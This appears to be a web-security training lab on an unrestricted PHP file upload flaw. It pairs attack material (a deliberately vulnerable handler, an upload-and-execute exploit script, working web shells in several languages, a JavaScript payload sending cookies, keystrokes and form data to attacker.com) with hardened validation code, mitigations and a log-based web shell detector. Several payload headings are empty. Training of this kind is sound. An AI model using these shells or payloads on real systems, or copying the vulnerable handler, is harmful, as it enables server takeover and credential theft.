Lab 1: Basic File Upload

File upload without proper validation

Difficulty: Low

Lab Overview

This lab demonstrates a basic file upload vulnerability: the application accepts any file type and writes it, under the name the client supplied, into an uploads/ directory inside the web root, without checking either the extension or the content. A file such as webshell.php is therefore stored next to the application and is executed by PHP on the next request for it.

Objective: Upload malicious files to achieve server compromise or data exfiltration.

Vulnerable Code
// Vulnerable: Basic file upload without validation.
// $file is one entry of $_FILES, e.g. $_FILES['file'] from a multipart POST.
function process_file_upload($file) {
    if (empty($file['name'])) {
        return false;
    }
    
    // Vulnerable: Direct file upload without validation.
    // 'uploads/' is relative to the running script, i.e. inside the web root,
    // so anything written here is reachable (and, for .php, executed) over HTTP.
    $upload_dir = 'uploads/';
    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }
    
    // basename() only strips directory components from the client-supplied
    // name; the extension (e.g. .php) and the name itself are kept as-is.
    $file_path = $upload_dir . basename($file['name']);
    
    // No extension allowlist, no content check, no size limit, no renaming.
    if (move_uploaded_file($file['tmp_name'], $file_path)) {
        return $file_path;
    }
    
    return false;
}
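As an added example that is not part of the lab's code, the following Python module is the hardened counterpart of the PHP handler above: it applies the checks this page lists under Mitigation Strategies (extension allowlist, content validation, size limit, server-generated file names, storage outside the web root) to the same kind of input the PHP function receives. The function names, the allowlist, the 2 MiB limit and the marker list are assumptions chosen for the example; port the logic to PHP for the lab itself.

```python
import os
import secrets
from dataclasses import dataclass

# Added example, not the lab's code. Policy values are assumptions.
MAX_BYTES = 2 * 1024 * 1024  # 2 MiB size limit (assumed policy)

# Allowlist: extension -> (required leading magic bytes, MIME type to serve it with)
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
    "pdf": (b"%PDF-", "application/pdf"),
}

# Byte sequences that have no business inside an accepted file: a valid PNG
# that also carries a PHP open tag is a polyglot aimed at the server engine.
# Binary data can contain these by chance, so re-encoding images is the
# robust fix; this check is a cheap first line.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""   # server-generated; never the client's name
    mime: str = ""


def validate_upload(client_name: str, data: bytes) -> Verdict:
    """Decide whether one uploaded file (name as sent by the client, raw bytes) is acceptable."""
    if not data:
        return Verdict(False, "empty file")
    if len(data) > MAX_BYTES:
        return Verdict(False, "exceeds size limit")

    # Reject null bytes and path separators outright instead of sanitising
    # them ("shell.php\x00.png", "../../x.png"); basename() is not enough.
    if "\x00" in client_name or "/" in client_name or "\\" in client_name:
        return Verdict(False, "illegal characters in filename")

    # Judge by the LAST extension: "shell.php.png" is treated as png, and the
    # content check below decides whether it really is one.
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED:
        return Verdict(False, f"extension not allowed: {ext or '(none)'}")

    magic, mime = ALLOWED[ext]
    if not data.startswith(magic):
        return Verdict(False, "content does not match extension")
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        return Verdict(False, "embedded script marker")

    # Never reuse the client's name: random name plus the allowlisted
    # extension, so nothing like ".phtml" or ".htaccess" can land on disk.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return Verdict(True, "ok", stored, mime)


def store_upload(client_name: str, data: bytes, upload_root: str) -> Verdict:
    """Validate, then write into a directory outside the web root, non-executable."""
    verdict = validate_upload(client_name, data)
    if not verdict.accepted:
        return verdict
    os.makedirs(upload_root, mode=0o750, exist_ok=True)
    path = os.path.join(upload_root, verdict.stored_name)
    # O_EXCL: fail rather than overwrite if the random name ever collides.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return verdict
```

Serve accepted files through a download handler that looks them up by `stored_name`, sets the `mime` recorded here and adds `Content-Disposition: attachment`; the client's original name is at most metadata for display.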
File Upload
⚠️ File Upload Warning

This lab demonstrates file upload vulnerabilities. You can upload:

  • PHP files (webshells)
  • Executable files
  • Script files
  • Any file type
File Upload Examples

Try uploading these files:

  • webshell.php - PHP web shell
  • malicious.js - JavaScript file
  • backdoor.exe - Executable file
  • config.txt - Configuration file

Vulnerability Details
  • Type: File Upload
  • Severity: High
  • Method: POST
  • Issue: No file validation or filtering
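To exercise the lab without a browser, the following Python script (an added example, not the lab's own code) builds the multipart POST a browser would send, uploads a one-line PHP web shell and then requests it with a command. The lab URL, the form field name `file`, the `uploads/` path and the one-line shell are assumptions about this lab's form, which the page does not show; check the form's HTML before running it. Building the body by hand is deliberate: the declared part Content-Type is attacker-controlled, which is why the hardened handler must not trust it.

```python
import secrets
import urllib.parse
import urllib.request

# Added example, not the lab's code. LAB_URL and the field/path names are assumptions.
LAB_URL = "http://localhost/fileupload/"

# Constructed payload: the classic one-line PHP web shell.
WEBSHELL = b"<?php system($_GET['cmd']); ?>"


def build_multipart(field: str, filename: str, content: bytes,
                    content_type: str, boundary: str = ""):
    """Build a multipart/form-data body (what a browser sends for a file input).

    content_type is whatever the client claims; a handler that trusts it can be
    fed 'image/png' for a .php file. Returns (body, Content-Type header value).
    """
    boundary = boundary or "----" + secrets.token_hex(16)
    parts = [
        f"--{boundary}".encode(),
        (f'Content-Disposition: form-data; name="{field}"; '
         f'filename="{filename}"').encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        content,
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def shell_url(base: str, filename: str, cmd: str) -> str:
    """URL of the stored shell, with the command URL-encoded in the query string."""
    target = urllib.parse.urljoin(base, "uploads/" + filename)
    return target + "?" + urllib.parse.urlencode({"cmd": cmd})


def upload_and_run(base: str, filename: str, cmd: str = "id") -> str:
    """Upload WEBSHELL under `filename`, then execute `cmd` through it."""
    body, ctype = build_multipart("file", filename, WEBSHELL, "application/octet-stream")
    req = urllib.request.Request(base, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as resp:
        resp.read()  # the lab's confirmation page; the stored path is predictable anyway
    with urllib.request.urlopen(shell_url(base, filename, cmd), timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print(upload_and_run(LAB_URL, "webshell.php", "id"))
```

Run it only against a lab instance you are authorised to test; the second request is what turns a stored file into code execution, and it leaves the access-log trace the detection example later on this page looks for.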
File Upload Payloads

Use these files to test file upload vulnerabilities:

1. Basic PHP Web Shell (webshell.php):
2. Advanced PHP Web Shell (advanced_shell.php):
3. File Manager Web Shell (filemanager.php):
4. Database Web Shell (db_shell.php):
5. Reverse Shell (reverse_shell.php):
6. Data Exfiltration Shell (exfil_shell.php):
7. Keylogger Shell (keylogger.php):
8. File Upload Shell (upload_shell.php):
9. System Information Shell (info_shell.php):
10. Network Scanner Shell (network_shell.php):
11. JavaScript Web Shell (webshell.js):
// JavaScript "web shell": unlike the PHP shells above this runs in the browser
// of whoever loads the uploaded file as a script, not on the server. It posts
// session data, keystrokes and form submissions to attacker.com.
fetch('https://attacker.com/steal', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    cookie: document.cookie,
    localStorage: JSON.stringify(localStorage),
    sessionStorage: JSON.stringify(sessionStorage),
    userAgent: navigator.userAgent,
    url: window.location.href
  })
});

// Keylogger
document.addEventListener('keypress', function(e) {
  fetch('https://attacker.com/keys', { method: 'POST', body: 'key=' + e.key });
});

// Form hijacking: copy every submitted form to the attacker before it goes to the site
var forms = document.getElementsByTagName('form');
for (var i = 0; i < forms.length; i++) {
  forms[i].addEventListener('submit', function(e) {
    var data = new FormData(this);
    fetch('https://attacker.com/forms', { method: 'POST', body: data });
  });
}
12. Python Web Shell (webshell.py):
#!/usr/bin/env python3
# Python CGI web shell: runs the 'cmd' query/form parameter through a shell.
# Note: the cgi module is deprecated since Python 3.11 and removed in 3.13.
import cgi
import subprocess

print("Content-Type: text/html\n")
form = cgi.FieldStorage()
if 'cmd' in form:
    cmd = form['cmd'].value
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        print(f"<pre>{result.stdout}</pre>")
        if result.stderr:
            print(f"<pre>Error: {result.stderr}</pre>")
    except Exception as e:
        print(f"<pre>Error: {e}</pre>")
# Minimal form for submitting the next command
print("""<form method="POST"><input name="cmd"><input type="submit" value="Run"></form>""")
13. Perl Web Shell (webshell.pl):
#!/usr/bin/perl
# Perl CGI web shell: backticks run the 'cmd' parameter through /bin/sh.
use strict;
use CGI;

my $cgi = CGI->new;
print $cgi->header;
if ($cgi->param('cmd')) {
    my $cmd = $cgi->param('cmd');
    my $output = `$cmd 2>&1`;
    print "<pre>$output</pre>";
}
# Minimal form for submitting the next command
print <<HTML;
<form method="POST"><input name="cmd"><input type="submit" value="Run"></form>
HTML
14. Ruby Web Shell (webshell.rb):
#!/usr/bin/env ruby
# Ruby CGI web shell: backticks run the 'cmd' parameter through /bin/sh.
require 'cgi'

cgi = CGI.new
puts cgi.header
if cgi['cmd'] && !cgi['cmd'].empty?
  cmd = cgi['cmd']
  output = `#{cmd} 2>&1`
  puts "<pre>#{output}</pre>"
end
# Minimal form for submitting the next command
puts <<HTML
<form method="POST"><input name="cmd"><input type="submit" value="Run"></form>
HTML
15. Bash Web Shell (webshell.sh):
#!/bin/bash
# Bash CGI web shell: the POST body arrives on stdin as "cmd=<urlencoded>";
# strip the field name, decode it and hand the result to eval.
echo "Content-Type: text/html"
echo ""
if [ "$REQUEST_METHOD" = "POST" ]; then
    read -r body
    cmd="${body#cmd=}"                      # drop the form field name
    cmd="${cmd//+/ }"                       # '+' encodes a space in form data
    cmd="$(printf '%b' "${cmd//%/\\x}")"    # decode %XX sequences
    echo "<pre>"
    eval "$cmd" 2>&1
    echo "</pre>"
fi
# Minimal form for submitting the next command
cat << 'EOF'
<form method="POST"><input name="cmd"><input type="submit" value="Run"></form>
EOF
Real-World Attack Scenarios
Mitigation Strategies
  • Allowlist the permitted extensions and reject everything else; a block-list is not enough, since .php is not the only extension the PHP handler may be mapped to (.phtml, .phar, .php5 among others)
  • Validate file content (magic bytes, and for images re-encode them) in addition to the extension check, and never trust the Content-Type the client declares
  • Rename each upload to a server-generated name; basename() strips directories from the client's name but keeps the extension and the rest of the name
  • Enforce file size limits and per-user upload quotas
  • Store uploaded files outside the web root and serve them through a download handler that sets the Content-Type and Content-Disposition: attachment
  • Where files must stay under the web root, disable script execution for the upload directory in the web server configuration and set restrictive file permissions
  • Monitor access logs for requests to script files under the upload directory and for command-style query parameters
  • Set a Content Security Policy; it limits what uploaded HTML or JavaScript (such as webshell.js above) can do when served back to users, but does nothing against server-side execution
  • Include the upload path in regular security testing and vulnerability assessments
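The monitoring point above is the easiest one to act on in a lab like this, because a web shell leaves a distinctive trace: a POST to the upload form followed by GET requests for a script file under uploads/ with a command in the query string. The following Python detector (an added example, not part of the lab) runs that logic over constructed access-log lines in the common combined format. The endpoint paths, extension list, parameter names and IP addresses are assumptions made for the example.

```python
import os
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Added example, not the lab's code. Paths and parameter names are assumptions.
UPLOAD_ENDPOINT = "/fileupload/"            # where the lab's form POSTs
UPLOAD_DIR = "/fileupload/uploads/"         # the handler's 'uploads/' directory
EXEC_EXT = {".php", ".phtml", ".phar", ".php5", ".cgi", ".pl", ".py", ".rb", ".sh"}
CMD_PARAMS = ("cmd", "c", "exec", "command")  # common web shell parameter names

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one attacker uploads a shell and runs two commands,
# one ordinary user uploads an image and views it.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Oct/2025:08:20:59 +0000] "GET /fileupload/ HTTP/1.1" 200 4123
203.0.113.7 - - [21/Oct/2025:08:21:05 +0000] "POST /fileupload/ HTTP/1.1" 200 512
203.0.113.7 - - [21/Oct/2025:08:21:09 +0000] "GET /fileupload/uploads/webshell.php?cmd=id HTTP/1.1" 200 88
203.0.113.7 - - [21/Oct/2025:08:21:15 +0000] "GET /fileupload/uploads/webshell.php?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 200 2917
198.51.100.4 - - [21/Oct/2025:08:25:01 +0000] "POST /fileupload/ HTTP/1.1" 200 512
198.51.100.4 - - [21/Oct/2025:08:25:03 +0000] "GET /fileupload/uploads/avatar.png HTTP/1.1" 200 10480
"""


def parse_log_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(lines):
    """Return a list of alert dicts for web shell activity under the upload directory."""
    alerts = []
    uploads = defaultdict(int)     # POSTs to the upload form, per client IP
    executions = defaultdict(int)  # script fetches from uploads/, per client IP
    for line in lines:
        entry = parse_log_line(line)
        if entry is None:
            continue
        path, _, query = entry["target"].partition("?")
        if entry["method"] == "POST" and path == UPLOAD_ENDPOINT:
            uploads[entry["ip"]] += 1
            continue
        if not path.startswith(UPLOAD_DIR):
            continue
        # Any request for a script file in the upload directory is suspicious on
        # its own; a command-style parameter makes it an execution, and the
        # decoded value is worth having in the alert.
        if os.path.splitext(path)[1].lower() not in EXEC_EXT:
            continue
        params = parse_qs(query)
        cmd = next((params[p][0] for p in CMD_PARAMS if p in params), None)
        executions[entry["ip"]] += 1
        alerts.append({
            "ip": entry["ip"], "time": entry["time"], "path": path, "cmd": cmd,
            "rule": "webshell_command" if cmd is not None else "exec_from_upload_dir",
        })
    # Correlate: the same client both uploaded something and then executed a
    # script from the upload directory within this log window.
    for ip, count in executions.items():
        if uploads.get(ip):
            alerts.append({"ip": ip, "time": None, "path": UPLOAD_DIR, "cmd": None,
                           "rule": "upload_then_exec",
                           "uploads": uploads[ip], "executions": count})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample the detector raises two webshell_command alerts for 203.0.113.7 (commands `id` and `cat /etc/passwd`, decoded from the query string) plus one correlated upload_then_exec alert, and nothing for the user who fetched avatar.png. A production rule should also key on the stored filename from the upload response, and a cheaper control, blocking script execution under uploads/ altogether, removes the need for the detection in the first place.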